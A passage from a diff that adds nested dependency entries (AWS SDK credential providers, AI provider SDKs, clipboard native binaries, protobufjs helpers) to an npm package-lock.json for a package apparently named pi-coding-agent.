+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=20.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-sdk/credential-provider-node": {
+			"version": "3.972.42",
+			"resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-node/-/credential-provider-node-3.972.42.tgz",
+			"integrity": "sha512-D4oon2zbqqsWOJUM99Gm3/ZyJ0IJvTXVN3PyloGb3kQEyI36fjCZheZj422lAgTWWd6TSHgiImLt3RIaLdv3dQ==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-sdk/credential-provider-env": "^3.972.37",
+				"@aws-sdk/credential-provider-http": "^3.972.39",
+				"@aws-sdk/credential-provider-ini": "^3.972.41",
+				"@aws-sdk/credential-provider-process": "^3.972.37",
+				"@aws-sdk/credential-provider-sso": "^3.972.41",
+				"@aws-sdk/credential-provider-web-identity": "^3.972.41",
+				"@aws-sdk/types": "^3.973.8",
+				"@smithy/core": "^3.24.2",
+				"@smithy/credential-provider-imds": "^4.3.2",
+				"@smithy/types": "^4.14.1",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=20.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-sdk/credential-provider-process": {
+			"version": "3.972.37",
+			"resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-process/-/credential-provider-process-3.972.37.tgz",
+			"integrity": "sha512-7nVaHBUaWIddASYfVaA9O4D5ZVjewU3sCol9WqZPGfW0nR+0WqE0xHZnD/U2L33PlOB8KNXGKZ6wOES/QijKzg==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-sdk/core": "^3.974.11",
+				"@aws-sdk/types": "^3.973.8",
+				"@smithy/core": "^3.24.2",
+				"@smithy/types": "^4.14.1",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=20.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-sdk/credential-provider-sso": {
+			"version": "3.972.41",
+			"resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-sso/-/credential-provider-sso-3.972.41.tgz",
+			"integrity": "sha512-IOWAWEHe5LkjSKkkUUX9ciV6Y1scHTsnfEkdt5yyC4Slrc7AGbkLPrpntjqh18ksJAMOaVhoBsO8p2WyTcY2wQ==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-sdk/core": "^3.974.11",
+				"@aws-sdk/nested-clients": "^3.997.9",
+				"@aws-sdk/token-providers": "3.1048.0",
+				"@aws-sdk/types": "^3.973.8",
+				"@smithy/core": "^3.24.2",
+				"@smithy/types": "^4.14.1",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=20.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-sdk/credential-provider-web-identity": {
+			"version": "3.972.41",
+			"resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-web-identity/-/credential-provider-web-identity-3.972.41.tgz",
+			"integrity": "sha512-mbACk9Yypa8nm4iGZLs0PofOXEcTDOUw6wDnsPXNDNSd2WNXs1tSo+6nc/fh0jLYdfVZThhBL98PHW4aXFsG5A==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-sdk/core": "^3.974.11",
+				"@aws-sdk/nested-clients": "^3.997.9",
+				"@aws-sdk/types": "^3.973.8",
+				"@smithy/core": "^3.24.2",
+				"@smithy/types": "^4.14.1",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=20.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-sdk/eventstream-handler-node": {
+			"version": "3.972.16",
+			"resolved": "https://registry.npmjs.org/@aws-sdk/eventstream-handler-node/-/eventstream-handler-node-3.972.16.tgz",
+			"integrity": "sha512-yedpPgKftqjU5SlPFHfqWpOw6xSCRieWRG1euWOlXn4WJxt2VX92VprCa2PpSOXjVCAeK6dTjW9eJRXVig9yGA==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-sdk/types": "^3.973.8",
+				"@smithy/core": "^3.24.2",
+				"@smithy/types": "^4.14.1",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=20.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-sdk/middleware-eventstream": {
+			"version": "3.972.12",
+			"resolved": "https://registry.npmjs.org/@aws-sdk/middleware-eventstream/-/middleware-eventstream-3.972.12.tgz",
+			"integrity": "sha512-tHTHHCHNrq6XklQvlzHBDJG4Iuhh7NVPRdtmvP+nHFA+5sxPlIDzlAHHgfoYHGvT3NXP1yVP/L5c3opUn6T3Qg==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-sdk/types": "^3.973.8",
+				"@smithy/core": "^3.24.2",
+				"@smithy/types": "^4.14.1",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=20.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-sdk/middleware-websocket": {
+			"version": "3.972.19",
+			"resolved": "https://registry.npmjs.org/@aws-sdk/middleware-websocket/-/middleware-websocket-3.972.19.tgz",
+			"integrity": "sha512-mkEhOGYozqKQkbFaVrjwr0faiwwZza1v5/jSY6Tucm3bD+uKTazIUH/4Yo6aMnQD2ua2W9cMP6s8mvwTcjtqHw==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-sdk/core": "^3.974.11",
+				"@aws-sdk/types": "^3.973.8",
+				"@smithy/core": "^3.24.2",
+				"@smithy/fetch-http-handler": "^5.4.2",
+				"@smithy/signature-v4": "^5.4.2",
+				"@smithy/types": "^4.14.1",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">= 14.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-sdk/nested-clients": {
+			"version": "3.997.9",
+			"resolved": "https://registry.npmjs.org/@aws-sdk/nested-clients/-/nested-clients-3.997.9.tgz",
+			"integrity": "sha512-jPR3rnmRI4hWYyzfmTGBr7NblMp8QYYeflHXba1H6+7CGrWVqWKQzaXFQ4qbExqPRsXN3T3L3JxFhr6aouXUGQ==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-crypto/sha256-browser": "5.2.0",
+				"@aws-crypto/sha256-js": "5.2.0",
+				"@aws-sdk/core": "^3.974.11",
+				"@aws-sdk/signature-v4-multi-region": "^3.996.27",
+				"@aws-sdk/types": "^3.973.8",
+				"@smithy/core": "^3.24.2",
+				"@smithy/fetch-http-handler": "^5.4.2",
+				"@smithy/node-http-handler": "^4.7.2",
+				"@smithy/types": "^4.14.1",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=20.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-sdk/signature-v4-multi-region": {
+			"version": "3.996.27",
+			"resolved": "https://registry.npmjs.org/@aws-sdk/signature-v4-multi-region/-/signature-v4-multi-region-3.996.27.tgz",
+			"integrity": "sha512-0Phbz4t6HI3D3skxvG2uI+VWU034/nSIw1T8d+FPzzQG9EQTrw94o9mOKO2Gv3n3Oc8P7JD7RAUxkoneLWv5Eg==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-sdk/types": "^3.973.8",
+				"@smithy/core": "^3.24.2",
+				"@smithy/signature-v4": "^5.4.2",
+				"@smithy/types": "^4.14.1",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=20.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-sdk/token-providers": {
+			"version": "3.1048.0",
+			"resolved": "https://registry.npmjs.org/@aws-sdk/token-providers/-/token-providers-3.1048.0.tgz",
+			"integrity": "sha512-k0y/GcuesuSfWyUM0WamrGyeZmltRYaPbHO82UDA6mZ/doB+FOHKutikPAtSXMn/hDz970cF+iRuuiYO9VEbAA==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@aws-sdk/core": "^3.974.11",
+				"@aws-sdk/nested-clients": "^3.997.9",
+				"@aws-sdk/types": "^3.973.8",
+				"@smithy/core": "^3.24.2",
+				"@smithy/types": "^4.14.1",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=20.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-sdk/types": {
+			"version": "3.973.8",
+			"resolved": "https://registry.npmjs.org/@aws-sdk/types/-/types-3.973.8.tgz",
+			"integrity": "sha512-gjlAdtHMbtR9X5iIhVUvbVcy55KnznpC6bkDUWW9z915bi0ckdUr5cjf16Kp6xq0bP5HBD2xzgbL9F9Quv5vUw==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@smithy/types": "^4.14.1",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=20.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-sdk/util-locate-window": {
+			"version": "3.965.5",
+			"resolved": "https://registry.npmjs.org/@aws-sdk/util-locate-window/-/util-locate-window-3.965.5.tgz",
+			"integrity": "sha512-WhlJNNINQB+9qtLtZJcpQdgZw3SCDCpXdUJP7cToGwHbCWCnRckGlc6Bx/OhWwIYFNAn+FIydY8SZ0QmVu3xTQ==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=20.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws-sdk/xml-builder": {
+			"version": "3.972.24",
+			"resolved": "https://registry.npmjs.org/@aws-sdk/xml-builder/-/xml-builder-3.972.24.tgz",
+			"integrity": "sha512-V8z5YcDPfsvzrBlj0xR1vhRtocblhYbqdreCJB/voGd4Sr5zjNAeWxexbnqVtskTJe0vFb5KMqbSL++ePl+zRw==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@nodable/entities": "2.1.0",
+				"@smithy/types": "^4.14.1",
+				"fast-xml-parser": "5.7.3",
+				"tslib": "^2.6.2"
+			},
+			"engines": {
+				"node": ">=20.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@aws/lambda-invoke-store": {
+			"version": "0.2.4",
+			"resolved": "https://registry.npmjs.org/@aws/lambda-invoke-store/-/lambda-invoke-store-0.2.4.tgz",
+			"integrity": "sha512-iY8yvjE0y651BixKNPgmv1WrQc+GZ142sb0z4gYnChDDY2YqI4P/jsSopBWrKfAt7LOJAkOXt7rC/hms+WclQQ==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"engines": {
+				"node": ">=18.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@babel/runtime": {
+			"version": "7.29.2",
+			"resolved": "https://registry.npmjs.org/@babel/runtime/-/runtime-7.29.2.tgz",
+			"integrity": "sha512-JiDShH45zKHWyGe4ZNVRrCjBz8Nh9TMmZG1kh4QTK8hCBTWBi8Da+i7s1fJw7/lYpM4ccepSNfqzZ/QvABBi5g==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"engines": {
+				"node": ">=6.9.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@earendil-works/pi-agent-core": {
+			"version": "0.82.1",
+			"resolved": "https://registry.npmjs.org/@earendil-works/pi-agent-core/-/pi-agent-core-0.82.1.tgz",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"@earendil-works/pi-ai": "^0.82.1",
+				"diff": "8.0.4",
+				"ignore": "7.0.5",
+				"typebox": "1.1.38",
+				"yaml": "2.9.0"
+			},
+			"engines": {
+				"node": ">=22.19.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@earendil-works/pi-ai": {
+			"version": "0.82.1",
+			"resolved": "https://registry.npmjs.org/@earendil-works/pi-ai/-/pi-ai-0.82.1.tgz",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"@anthropic-ai/sdk": "0.91.1",
+				"@aws-sdk/client-bedrock-runtime": "3.1048.0",
+				"@google/genai": "1.52.0",
+				"@mistralai/mistralai": "2.2.6",
+				"@opentelemetry/api": "1.9.0",
+				"@smithy/node-http-handler": "4.7.3",
+				"http-proxy-agent": "7.0.2",
+				"https-proxy-agent": "7.0.6",
+				"openai": "6.26.0",
+				"partial-json": "0.1.7",
+				"typebox": "1.1.38"
+			},
+			"bin": {
+				"pi-ai": "dist/cli.js"
+			},
+			"engines": {
+				"node": ">=22.19.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@earendil-works/pi-tui": {
+			"version": "0.82.1",
+			"resolved": "https://registry.npmjs.org/@earendil-works/pi-tui/-/pi-tui-0.82.1.tgz",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"get-east-asian-width": "1.6.0",
+				"marked": "18.0.5"
+			},
+			"engines": {
+				"node": ">=22.19.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@google/genai": {
+			"version": "1.52.0",
+			"resolved": "https://registry.npmjs.org/@google/genai/-/genai-1.52.0.tgz",
+			"integrity": "sha512-gwSvbpiN/17O9TbsqSsE/OzZcpv5Fo4RQjdngGgogtuB9RsyJ8ZHhX5KjHj1bp5N9snN2eK8LDGXSaWW2hof8Q==",
+			"dev": true,
+			"hasInstallScript": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"google-auth-library": "^10.3.0",
+				"p-retry": "^4.6.2",
+				"protobufjs": "^7.5.4",
+				"ws": "^8.18.0"
+			},
+			"engines": {
+				"node": ">=20.0.0"
+			},
+			"peerDependencies": {
+				"@modelcontextprotocol/sdk": "^1.25.2"
+			},
+			"peerDependenciesMeta": {
+				"@modelcontextprotocol/sdk": {
+					"optional": true
+				}
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@mariozechner/clipboard": {
+			"version": "0.3.9",
+			"resolved": "https://registry.npmjs.org/@mariozechner/clipboard/-/clipboard-0.3.9.tgz",
+			"integrity": "sha512-ABnA53mdfkGZwOFUdZNv2S0CWGO/EIuPj8Vv9xmBFmSYg/qFc7ihO6q5FcQjvoE67kZpWkEc4AhD6B/os04yuA==",
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"peer": true,
+			"engines": {
+				"node": ">= 10"
+			},
+			"optionalDependencies": {
+				"@mariozechner/clipboard-darwin-arm64": "0.3.9",
+				"@mariozechner/clipboard-darwin-universal": "0.3.9",
+				"@mariozechner/clipboard-darwin-x64": "0.3.9",
+				"@mariozechner/clipboard-linux-arm64-gnu": "0.3.9",
+				"@mariozechner/clipboard-linux-arm64-musl": "0.3.9",
+				"@mariozechner/clipboard-linux-riscv64-gnu": "0.3.9",
+				"@mariozechner/clipboard-linux-x64-gnu": "0.3.9",
+				"@mariozechner/clipboard-linux-x64-musl": "0.3.9",
+				"@mariozechner/clipboard-win32-arm64-msvc": "0.3.9",
+				"@mariozechner/clipboard-win32-x64-msvc": "0.3.9"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@mariozechner/clipboard-darwin-arm64": {
+			"version": "0.3.9",
+			"resolved": "https://registry.npmjs.org/@mariozechner/clipboard-darwin-arm64/-/clipboard-darwin-arm64-0.3.9.tgz",
+			"integrity": "sha512-BfgV7vCEWZwJwZJw03r6bP5+tf0iI/ANuQYCxi9RNn7FrWB3yzGuMKCrNLRl6V761vXRdL8+OqZ0wd4TqlsNOQ==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"darwin"
+			],
+			"peer": true,
+			"engines": {
+				"node": ">= 10"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@mariozechner/clipboard-darwin-universal": {
+			"version": "0.3.9",
+			"resolved": "https://registry.npmjs.org/@mariozechner/clipboard-darwin-universal/-/clipboard-darwin-universal-0.3.9.tgz",
+			"integrity": "sha512-BGGR4iA9Z2shAjI65eI5xtyb3LYNlDW9X3gxKxDbqtbnREohsrqznov6zpKoIrsRWpzlYVEdKphS7ksJ0/ndSQ==",
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"darwin"
+			],
+			"peer": true,
+			"engines": {
+				"node": ">= 10"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@mariozechner/clipboard-darwin-x64": {
+			"version": "0.3.9",
+			"resolved": "https://registry.npmjs.org/@mariozechner/clipboard-darwin-x64/-/clipboard-darwin-x64-0.3.9.tgz",
+			"integrity": "sha512-4kURmCbS6nt8uYhtmWpUcJWyPHfmAr5dTpXD1nO3pIfa+TSQ9DbrGOYCKH+aEFW47XhQ4Vp8ZTszie+wfFvDKg==",
+			"cpu": [
+				"x64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"darwin"
+			],
+			"peer": true,
+			"engines": {
+				"node": ">= 10"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@mariozechner/clipboard-linux-arm64-gnu": {
+			"version": "0.3.9",
+			"resolved": "https://registry.npmjs.org/@mariozechner/clipboard-linux-arm64-gnu/-/clipboard-linux-arm64-gnu-0.3.9.tgz",
+			"integrity": "sha512-g59OkUGP2DDfCOIKypHeYgv2M55u/cKvXa5dSxFbEJ34XvIQMdcVmpKCkGUro3ZgefXiGVdwguvTMQGpHWzIXw==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"peer": true,
+			"engines": {
+				"node": ">= 10"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@mariozechner/clipboard-linux-arm64-musl": {
+			"version": "0.3.9",
+			"resolved": "https://registry.npmjs.org/@mariozechner/clipboard-linux-arm64-musl/-/clipboard-linux-arm64-musl-0.3.9.tgz",
+			"integrity": "sha512-AGuJdgKsmJdm4Pych7kv3sqe591ERRaAHW3xjLooiFzn8J+PxUyof++7YZrB5Y5tpnTO+K18Og3taj2NpluCRQ==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"peer": true,
+			"engines": {
+				"node": ">= 10"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@mariozechner/clipboard-linux-riscv64-gnu": {
+			"version": "0.3.9",
+			"resolved": "https://registry.npmjs.org/@mariozechner/clipboard-linux-riscv64-gnu/-/clipboard-linux-riscv64-gnu-0.3.9.tgz",
+			"integrity": "sha512-DXBEAiuMpk7dhS1a9NzNxVAFi1vaKoPu7rQNgY8LIDLGrK3lnIp3nT10DUum+PKVJoJppIP+NAA8IZe4DMNDPw==",
+			"cpu": [
+				"riscv64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"peer": true,
+			"engines": {
+				"node": ">= 10"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@mariozechner/clipboard-linux-x64-gnu": {
+			"version": "0.3.9",
+			"resolved": "https://registry.npmjs.org/@mariozechner/clipboard-linux-x64-gnu/-/clipboard-linux-x64-gnu-0.3.9.tgz",
+			"integrity": "sha512-WORrMLd6EpElEME7JRKfSaY34nW1P5LbdgK5YNCS1ncG2LqmITsSMEJ8nh2mpvxb3TxqbOOKgY7k9eMJYlW9Mw==",
+			"cpu": [
+				"x64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"peer": true,
+			"engines": {
+				"node": ">= 10"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@mariozechner/clipboard-linux-x64-musl": {
+			"version": "0.3.9",
+			"resolved": "https://registry.npmjs.org/@mariozechner/clipboard-linux-x64-musl/-/clipboard-linux-x64-musl-0.3.9.tgz",
+			"integrity": "sha512-/DHn+1DrfL6oRaPPWXaOKvonFFrni666fxd+zFqiQEfvBH0tsHVWjq9iqBk0oDp0qaPA72lIMy5BptxISBEhZQ==",
+			"cpu": [
+				"x64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"peer": true,
+			"engines": {
+				"node": ">= 10"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@mariozechner/clipboard-win32-arm64-msvc": {
+			"version": "0.3.9",
+			"resolved": "https://registry.npmjs.org/@mariozechner/clipboard-win32-arm64-msvc/-/clipboard-win32-arm64-msvc-0.3.9.tgz",
+			"integrity": "sha512-O5FHD3ErkMwMhNzAfu3ggy0ug4z7btZuoQgwwxlzPrwV2bxlD6WDpqBY4NCgICAgZdDKdp+loUEKVAVt8aYnhQ==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"win32"
+			],
+			"peer": true,
+			"engines": {
+				"node": ">= 10"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@mariozechner/clipboard-win32-x64-msvc": {
+			"version": "0.3.9",
+			"resolved": "https://registry.npmjs.org/@mariozechner/clipboard-win32-x64-msvc/-/clipboard-win32-x64-msvc-0.3.9.tgz",
+			"integrity": "sha512-ihQC3EufqEY81vhXBgVBtK4prL+wc62zJsSvxrgz7K1hsdt6OObz6v9p3Rn1OG3GJksTTKMJF0u/guMISHPhSA==",
+			"cpu": [
+				"x64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"win32"
+			],
+			"peer": true,
+			"engines": {
+				"node": ">= 10"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@mistralai/mistralai": {
+			"version": "2.2.6",
+			"resolved": "https://registry.npmjs.org/@mistralai/mistralai/-/mistralai-2.2.6.tgz",
+			"integrity": "sha512-W8pX7zHxjJvMIpw8JMxeJEleapXX0Q9NPszdNzqkM3MIEoIGPObdodujj+WHteXEvGfaP/AMwlNyRfEzSY6dQQ==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"dependencies": {
+				"@opentelemetry/semantic-conventions": "^1.40.0",
+				"ws": "^8.18.0",
+				"zod": "^3.25.0 || ^4.0.0",
+				"zod-to-json-schema": "^3.25.0"
+			},
+			"peerDependencies": {
+				"@opentelemetry/api": "^1.9.0"
+			},
+			"peerDependenciesMeta": {
+				"@opentelemetry/api": {
+					"optional": true
+				}
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@nodable/entities": {
+			"version": "2.1.0",
+			"resolved": "https://registry.npmjs.org/@nodable/entities/-/entities-2.1.0.tgz",
+			"integrity": "sha512-nyT7T3nbMyBI/lvr6L5TyWbFJAI9FTgVRakNoBqCD+PmID8DzFrrNdLLtHMwMszOtqZa8PAOV24ZqDnQrhQINA==",
+			"dev": true,
+			"funding": [
+				{
+					"type": "github",
+					"url": "https://github.com/sponsors/nodable"
+				}
+			],
+			"license": "MIT",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@opentelemetry/api": {
+			"version": "1.9.0",
+			"resolved": "https://registry.npmjs.org/@opentelemetry/api/-/api-1.9.0.tgz",
+			"integrity": "sha512-3giAOQvZiH5F9bMlMiv8+GSPMeqg0dbaeo58/0SlA9sxSqZhnUtxzX9/2FzyhS9sWQf5S0GJE0AKBrFqjpeYcg==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"engines": {
+				"node": ">=8.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@opentelemetry/semantic-conventions": {
+			"version": "1.41.1",
+			"resolved": "https://registry.npmjs.org/@opentelemetry/semantic-conventions/-/semantic-conventions-1.41.1.tgz",
+			"integrity": "sha512-/UhIkaZgPutTFmQ7RnIJGgDXZmtEJ7Dvi86xNTFWcnRxVRNk/aotsqDJYeEvDP+FSMB2SdW+pQzNMcWP0rwuNA==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"engines": {
+				"node": ">=14"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@protobufjs/aspromise": {
+			"version": "1.1.2",
+			"resolved": "https://registry.npmjs.org/@protobufjs/aspromise/-/aspromise-1.1.2.tgz",
+			"integrity": "sha512-j+gKExEuLmKwvz3OgROXtrJ2UG2x8Ch2YZUxahh+s1F2HZ+wAceUNLkvy6zKCPVRkU++ZWQrdxsUeQXmcg4uoQ==",
+			"dev": true,
+			"license": "BSD-3-Clause",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@protobufjs/base64": {
+			"version": "1.1.2",
+			"resolved": "https://registry.npmjs.org/@protobufjs/base64/-/base64-1.1.2.tgz",
+			"integrity": "sha512-AZkcAA5vnN/v4PDqKyMR5lx7hZttPDgClv83E//FMNhR2TMcLUhfRUBHCmSl0oi9zMgDDqRUJkSxO3wm85+XLg==",
+			"dev": true,
+			"license": "BSD-3-Clause",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@protobufjs/codegen": {
+			"version": "2.0.5",
+			"resolved": "https://registry.npmjs.org/@protobufjs/codegen/-/codegen-2.0.5.tgz",
+			"integrity": "sha512-zgXFLzW3Ap33e6d0Wlj4MGIm6Ce8O89n/apUaGNB/jx+hw+ruWEp7EwGUshdLKVRCxZW12fp9r40E1mQrf/34g==",
+			"dev": true,
+			"license": "BSD-3-Clause",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@protobufjs/eventemitter": {
+			"version": "1.1.1",
+			"resolved": "https://registry.npmjs.org/@protobufjs/eventemitter/-/eventemitter-1.1.1.tgz",
+			"integrity": "sha512-vW1GmwMZNnL+gMRaovlh9yZX74kc+TTU3FObkkurpMaRtBfLP3ldjS9KQWlwZgraRE0+dheEEoAxdzcJQ8eXZg==",
+			"dev": true,
+			"license": "BSD-3-Clause",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@protobufjs/fetch": {
+			"version": "1.1.1",
+			"resolved": "https://registry.npmjs.org/@protobufjs/fetch/-/fetch-1.1.1.tgz",
+			"integrity": "sha512-GpptLrs57adMSuHi3VNj0mAF8dwh36LMaYF6XyJ6JMWlVsc+t42tm1HSEDmOs3A8fC9yyeisgLhsTVQokOZ0zw==",
+			"dev": true,
+			"license": "BSD-3-Clause",
+			"peer": true,
+			"dependencies": {
+				"@protobufjs/aspromise": "^1.1.1"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@protobufjs/float": {
+			"version": "1.0.2",
+			"resolved": "https://registry.npmjs.org/@protobufjs/float/-/float-1.0.2.tgz",
+			"integrity": "sha512-Ddb+kVXlXst9d+R9PfTIxh1EdNkgoRe5tOX6t01f1lYWOvJnSPDBlG241QLzcyPdoNTsblLUdujGSE4RzrTZGQ==",
+			"dev": true,
+			"license": "BSD-3-Clause",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@protobufjs/path": {
+			"version": "1.1.2",
+			"resolved": "https://registry.npmjs.org/@protobufjs/path/-/path-1.1.2.tgz",
+			"integrity": "sha512-6JOcJ5Tm08dOHAbdR3GrvP+yUUfkjG5ePsHYczMFLq3ZmMkAD98cDgcT2iA1lJ9NVwFd4tH/iSSoe44YWkltEA==",
+			"dev": true,
+			"license": "BSD-3-Clause",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@protobufjs/pool": {
+			"version": "1.1.0",
+			"resolved": "https://registry.npmjs.org/@protobufjs/pool/-/pool-1.1.0.tgz",
+			"integrity": "sha512-0kELaGSIDBKvcgS4zkjz1PeddatrjYcmMWOlAuAPwAeccUrPHdUqo/J6LiymHHEiJT5NrF1UVwxY14f+fy4WQw==",
+			"dev": true,
+			"license": "BSD-3-Clause",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@protobufjs/utf8": {
+			"version": "1.1.1",
+			"resolved": "https://registry.npmjs.org/@protobufjs/utf8/-/utf8-1.1.1.tgz",
+			"integrity": "sha512-oOAWABowe8EAbMyWKM0tYDKi8Yaox52D+HWZhAIJqQXbqe0xI/GV7FhLWqlEKreMkfDjshR5FKgi3mnle0h6Eg==",
+			"dev": true,
+			"license": "BSD-3-Clause",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@silvia-odwyer/photon-node": {
+			"version": "0.3.4",
+			"resolved": "https://registry.npmjs.org/@silvia-odwyer/photon-node/-/photon-node-0.3.4.tgz",
+			"integrity": "sha512-bnly4BKB3KDTFxrUIcgCLbaeVVS8lrAkri1pEzskpmxu9MdfGQTy8b8EgcD83ywD3RPMsIulY8xJH5Awa+t9fA==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/@smithy/core": {
+			"version": "3.24.3",
+			"resolved": "https://registry.npmjs.org/@smithy/core/-/core-3.24.3.tgz",
